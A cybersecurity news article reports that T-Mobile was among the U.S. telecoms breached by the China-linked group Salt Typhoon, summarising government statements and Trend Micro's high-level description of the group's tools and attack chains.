Chinese Hackers Exploit T-Mobile and Other U.S. Telecoms in Broader Espionage Campaign

Cyber Security

U.S. telecoms giant T-Mobile has confirmed that it was also among the companies that were targeted by Chinese threat actors to gain access to valuable information.

The adversaries, tracked as Salt Typhoon, breached the company as part of a “monthslong campaign” designed to harvest cellphone communications of “high-value intelligence targets.” It’s not clear what information was taken, if any, during the malicious activity.

“T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information,” a spokesperson for the company was quoted as saying to The Wall Street Journal. “We will continue to monitor this closely, working with industry peers and the relevant authorities.”

With the latest development, T-Mobile has joined a list of major organizations like AT&T, Verizon, and Lumen Technologies that have been singled out as part of what appears to be a full-blown cyber espionage campaign.

So far, the reports make no mention of the degree to which these attacks saw success, whether any kind of malware was installed, or what kinds of information they were after. Salt Typhoon’s unauthorized access to Americans’ cellular data records was previously disclosed by Politico.

Last week, the U.S. government said its ongoing investigation into the targeting of commercial telecommunications infrastructure revealed a “broad and significant” hack orchestrated by the People’s Republic of China (PRC).

“PRC-affiliated actors have compromised networks at multiple telecommunications companies to enable the theft of customer call records data, the compromise of private communications of a limited number of individuals who are primarily involved in government or political activity, and the copying of certain information that was subject to U.S. law enforcement requests pursuant to court orders,” it said.

It further warned that the extent and scope of these compromises could grow as the probe continues.

Salt Typhoon, which is also known as Earth Estries, FamousSparrow, GhostEmperor, and UNC2286, is said to have been active since at least 2020, according to Trend Micro. In August 2023, the spy crew was linked to a series of attacks aimed at government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S.

Analysis shows that the threat actors have methodically crafted their payloads and made use of an interesting combination of legitimate and bespoke tools and techniques to bypass defenses and maintain access to their targets.

“Earth Estries maintains persistence by continuously updating its tools and employs backdoors for lateral movement and credential theft,” Trend Micro researchers Ted Lee, Leon M Chang, and Lenart Bermejo said in an exhaustive analysis published earlier this month.

“Data collection and exfiltration are performed using Trillclient, while tools like cURL are used for sending information to anonymized file-sharing services, employing proxies to hide backdoor traffic.”

The cybersecurity company said it observed two distinct attack chains employed by the group, indicating the tradecraft that Salt Typhoon has in its arsenal is broad as it’s varied. Initial access to target networks is facilitated by exploiting vulnerabilities in outside-facing services or remote management utilities.

In one set of attacks, the threat actor has been found taking advantage of vulnerable or misconfigured QConvergeConsole installations to deliver malware such as Cobalt Strike, a custom Go-based stealer called TrillClient, and backdoors like HemiGate and Crowdoor, a variant of SparrowDoor which has been previously put to use by another China-linked group called Tropic Trooper.

Some of the other techniques include the use of PSExec to laterally install its backdoors and tools, and TrillClient to collect user credentials from web browser user-profiles and exfiltrate them to an attacker-controlled Gmail account via the Simple Mail Transfer Protocol (SMTP) to further its objectives.

The second infection sequence, in contrast, is a lot more sophisticated, with the threat actors abusing susceptible Microsoft Exchange servers to implant the China Chopper web shell, which is then used to deliver Cobalt Strike, Zingdoor, and Snappybee (aka Deed RAT), a suspected successor to the ShadowPad malware.

“Delivery of these additional backdoors and tools is done either via a [command-and-control] server or by using cURL to download them from attacker-controlled servers,” the researchers said. “These backdoor installations are also periodically replaced and updated.”

“The collection of documents of interest are done via RAR and are exfiltrated using cURL, with the data being sent to anonymized file sharing services.”

Also utilized in the attacks are programs like NinjaCopy to extract credentials and PortScan for network discovery and mapping. Persistence on the host is accomplished by means of scheduled tasks.

In one case, Salt Typhoon is also believed to have repurposed a victim’s proxy server to forward traffic to the actual command-and-control (C2) server in an attempt to conceal the malicious traffic.

Trend Micro noted that one of the infected machines also harbored two additional backdoors named Cryptmerlin, which executes additional commands issued by a C2 server, and FuxosDoor, an Internet Information Services (IIS) implant that’s deployed on a compromised Exchange Server and is also designed to run commands using cmd.exe.

“Our analysis of Earth Estries’ persistent TTPs in prolonged cyber operations reveals a sophisticated and adaptable threat actor that employs various tools and backdoors, demonstrating not only technical capabilities, but also a strategic approach to maintaining access and control within compromised environments,” the researchers said.

“Throughout their campaigns, Earth Estries has displayed a keen understanding of their target environments, by continually identifying exposed layers for re-entry. By using a combination of established tools and custom backdoors, they have created a multi-layered attack strategy that is difficult to detect and mitigate.”

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.